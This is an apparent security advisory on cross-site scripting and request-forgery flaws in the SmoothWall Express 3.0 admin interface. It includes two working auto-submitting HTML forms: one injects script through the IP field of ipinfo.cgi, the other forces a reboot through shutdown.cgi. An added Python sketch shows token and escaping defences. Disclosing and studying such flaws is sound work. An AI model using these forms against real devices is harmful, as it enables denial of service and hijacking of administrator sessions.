SmoothWall Express 3.0 Cross Site Request Forgery / Cross Site Scripting

2011-01-18 / 2015-01-01
Credit: Shakespeare
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79

The web management interface of SmoothWall Express 3.0 is vulnerable to xss and csrf.

xss example:

<html>
<title> SmoothWall Express 3.0 xss </title>
<body>
<form action="http://192.168.0.1:81/cgi-bin/ipinfo.cgi" method="post" id="xssplz">
<input type="hidden" name="IP" value='"<script>alert(1);</script>'></input>
<input type="hidden" name="ACTION" value='Run'></input>
</form>
<script>document.getElementById("xssplz").submit();</script>
</body>

csrf example:

<html>
<title> SmoothWall Express 3.0 csrf </title>
<body>
<form action="http://192.168.0.1:81/cgi-bin/shutdown.cgi" method="post" id="csrfplz">
<input type="hidden" name="ACTION" value='Reboot'></input>
</form>
<script>document.getElementById("csrfplz").submit();</script>
</body>

--
Something's rotten in the state of Denmark.
-- Shakespeare
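Added example, not part of the original advisory and not SmoothWall's code or the vendor's fix: a Python sketch of the two server-side checks whose absence the forms above rely on, a session-bound token on every POST and strict parsing plus HTML-escaping of the IP field. The handler names, the CSRF_TOKEN field name and the restriction of IP to address literals are assumptions made for illustration.

```python
import hashlib
import hmac
import html
import ipaddress
import secrets

# Assumption: a per-installation secret created at setup time.
SERVER_KEY = secrets.token_bytes(32)
# Only the ACTION value that appears in the advisory is allow-listed here.
ALLOWED_ACTIONS = {"Reboot"}

def issue_csrf_token(session_id: str) -> str:
    """Token bound to the admin session, embedded as a hidden field in each form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def csrf_ok(session_id: str, form: dict) -> bool:
    """Constant-time comparison; a form hosted on another origin cannot know the token."""
    supplied = str(form.get("CSRF_TOKEN", ""))  # hypothetical field name
    expected = issue_csrf_token(session_id)
    return hmac.compare_digest(supplied.encode(), expected.encode())

def handle_ipinfo(session_id: str, form: dict) -> tuple[int, str]:
    """Lookup form: IP must parse as an address and is escaped wherever it is echoed."""
    if not csrf_ok(session_id, form):
        return 403, "Request rejected: missing or invalid token"
    raw = str(form.get("IP", ""))
    try:
        addr = ipaddress.ip_address(raw.strip())
    except ValueError:
        # The rejected value is reflected only after HTML-escaping.
        return 400, "Invalid address: " + html.escape(raw, quote=True)
    return 200, '<input name="IP" value="' + html.escape(str(addr), quote=True) + '">'

def handle_shutdown(session_id: str, form: dict) -> tuple[int, str]:
    """State-changing request: needs a valid token and an allow-listed ACTION."""
    if not csrf_ok(session_id, form):
        return 403, "Request rejected: missing or invalid token"
    action = form.get("ACTION")
    if action not in ALLOWED_ACTIONS:
        return 400, "Unknown action"
    return 200, "Accepted: " + action
```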



Copyright 2022, cxsecurity.com

 
